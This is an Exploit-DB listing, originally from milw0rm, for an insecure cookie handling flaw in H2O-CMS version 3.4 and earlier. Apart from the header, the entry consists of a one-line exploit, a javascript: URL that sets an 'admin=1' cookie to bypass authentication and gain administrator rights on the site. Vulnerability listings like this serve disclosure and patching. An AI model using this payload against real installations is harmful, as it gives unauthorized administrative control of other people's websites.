H2O-CMS 3.4 - Insecure Cookie Handling

EDB-ID:

6862

CVE:



Author:

Stack

Type:

webapps


Platform:

PHP

Date:

2008-10-29


# ----------------------------------------------------------
# H2O-CMS <= 3.4 Insecure Cookie Handling Vulnerability
# Discovered By Mountassif Moad
# Download On http://sourceforge.net/projects/h2o-cms
# Home World http://v4-team.com
# ----------------------------------------------------------
Exploit:
javascript:document.cookie = "admin=1; path=/";

# milw0rm.com [2008-10-29]